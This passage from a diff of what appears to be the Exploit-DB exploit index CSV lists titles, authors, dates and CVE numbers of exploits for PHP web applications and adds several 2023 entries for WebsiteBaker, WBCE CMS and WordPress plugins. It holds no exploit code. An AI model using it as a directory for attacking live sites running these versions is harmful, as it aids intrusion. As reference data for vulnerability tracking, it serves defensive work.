Chat Profiles/Dating Script 3.0.2 - Authentication Bypass",2008-11-08,d3b4g,webapps,php,,2008-11-07,2017-01-02,1,OSVDB-51101;CVE-2008-5785,,,,, 7063,exploits/php/webapps/7063.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Insecure Cookie Handling",2008-11-08,Stack,webapps,php,,2008-11-07,,1,OSVDB-49675;CVE-2008-5784;CVE-2008-5783,,,,, 46348,exploits/php/webapps/46348.py,"VA MAX 8.3.4 - (Authenticated) Remote Code Execution",2019-02-11,"Cody Sixteen",webapps,php,,2019-02-11,2019-03-16,0,,,,,, +51562,exploits/php/webapps/51562.txt,"Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS)",2023-07-03,CraCkEr,webapps,php,,2023-07-03,2023-07-03,0,,,,,, 11410,exploits/php/webapps/11410.txt,"Vacation Rental Script - SQL Injection",2010-02-11,JaMbA,webapps,php,,2010-02-10,,1,OSVDB-62296;CVE-2010-0763,,,,, 6221,exploits/php/webapps/6221.txt,"Vacation Rental Script 3.0 - 'id' SQL Injection",2008-08-10,CraCkEr,webapps,php,,2008-08-09,2016-12-15,1,OSVDB-47372;CVE-2008-3603,,,,, 15793,exploits/php/webapps/15793.txt,"Vacation Rental Script 4.0 - Arbitrary File Upload",2010-12-20,Br0ly,webapps,php,,2010-12-20,2010-12-20,1,OSVDB-70019,,,,, @@ -31868,6 +31883,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50609,exploits/php/webapps/50609.py,"WBCE CMS 1.5.1 - Admin Password Reset",2021-12-20,citril,webapps,php,,2021-12-20,2021-12-20,0,CVE-2021-3817,,,,, 50707,exploits/php/webapps/50707.py,"WBCE CMS 1.5.2 - Remote Code Execution (RCE) (Authenticated)",2022-02-04,"Antonio Cuomo",webapps,php,,2022-02-04,2022-02-04,0,,,,,, 51484,exploits/php/webapps/51484.txt,"WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)",2023-05-25,"Mirabbas Ağalarov",webapps,php,,2023-05-25,2023-05-25,1,,,,,, +51566,exploits/php/webapps/51566.txt,"WBCE CMS 1.6.1 - Open Redirect & CSRF",2023-07-03,"Mirabbas Ağalarov",webapps,php,,2023-07-03,2023-07-03,0,,,,,, 51451,exploits/php/webapps/51451.txt,"WBiz Desk 1.2 - SQL Injection",2023-05-23,h4ck3r,webapps,php,,2023-05-23,2023-05-23,0,,,,,, 7337,exploits/php/webapps/7337.txt,"wbstreet 1.0 - SQL Injection / File Disclosure",2008-12-04,"CWH Underground",webapps,php,,2008-12-03,,1,OSVDB-51579;CVE-2008-5956;OSVDB-51575;CVE-2008-5955;OSVDB-50445;OSVDB-50444,,,,, 43864,exploits/php/webapps/43864.txt,"Wchat 1.5 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,,2018-01-23,2018-01-23,0,CVE-2018-5979,,,,, @@ -32160,6 +32176,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 35277,exploits/php/webapps/35277.txt,"WebsiteBaker 2.8.3 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",webapps,php,80,2014-11-17,2014-11-17,0,OSVDB-114748;OSVDB-114747;OSVDB-114746;OSVDB-114745;OSVDB-114744;OSVDB-114743;OSVDB-114742;OSVDB-114741;CVE-2014-9243;CVE-2014-9242,,,,http://www.exploit-db.comwb283-sp3.tar.gz, 23993,exploits/php/webapps/23993.txt,"WebsiteBaker Addon Concert Calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",webapps,php,,2013-01-09,2013-01-09,1,OSVDB-89046;OSVDB-89045,,,,http://www.exploit-db.comconcertcalendar-v2.2.zip,http://www.darksecurity.de/advisories/2012/SSCHADV2012-022.txt 51349,exploits/php/webapps/51349.txt,"WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)",2023-04-08,"Mirabbas Ağalarov",webapps,php,,2023-04-08,2023-04-08,0,,,,,, +51554,exploits/php/webapps/51554.txt,"WebsiteBaker v2.13.3 - Directory Traversal",2023-07-03,"Mirabbas Ağalarov",webapps,php,,2023-07-03,2023-07-03,0,,,,,, +51553,exploits/php/webapps/51553.txt,"WebsiteBaker v2.13.3 - Stored XSS",2023-07-03,"Mirabbas Ağalarov",webapps,php,,2023-07-03,2023-07-03,0,,,,,, 34541,exploits/php/webapps/34541.txt,"WebsiteKit Gbplus - 'Name' / 'Body' HTML Injection",2010-08-29,MiND,webapps,php,,2010-08-29,2014-09-06,1,,,,,,https://www.securityfocus.com/bid/42842/info 44686,exploits/php/webapps/44686.txt,"WebSocket Live Chat - Cross-Site Scripting",2018-05-22,"Alireza Norkazemi",webapps,php,,2018-05-22,2018-05-22,0,,,,,, 7653,exploits/php/webapps/7653.txt,"webSPELL 4 - Authentication Bypass",2009-01-03,anonymous,webapps,php,,2009-01-02,2017-01-11,1,,,,,, @@ -33774,6 +33792,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49657,exploits/php/webapps/49657.txt,"WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection",2021-03-17,securityforeveryone.com,webapps,php,,2021-03-17,2021-03-17,0,,,,,, 49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",2021-06-11,securityforeveryone.com,webapps,php,,2021-06-11,2021-06-11,0,,,,,, 51122,exploits/php/webapps/51122.py,"WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)",2023-03-29,AkuCyberSec,webapps,php,,2023-03-29,2023-06-09,1,CVE-2022-1565,,,,, +51560,exploits/php/webapps/51560.txt,"WP AutoComplete 1.0.4 - Unauthenticated SQLi",2023-07-03,matitanium,webapps,php,,2023-07-03,2023-07-03,0,CVE-2022-4297,,,,, 47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php,,2019-09-25,2019-09-25,0,,,,,, 51533,exploits/php/webapps/51533.py,"WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)",2023-06-20,"Amirhossein Bahramizadeh",webapps,php,,2023-06-20,2023-06-20,0,CVE-2023-3320,,,,, 51224,exploits/php/webapps/51224.py,"WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE",2023-04-03,BLY,webapps,php,,2023-04-03,2023-05-24,1,CVE-2020-25213,,,,,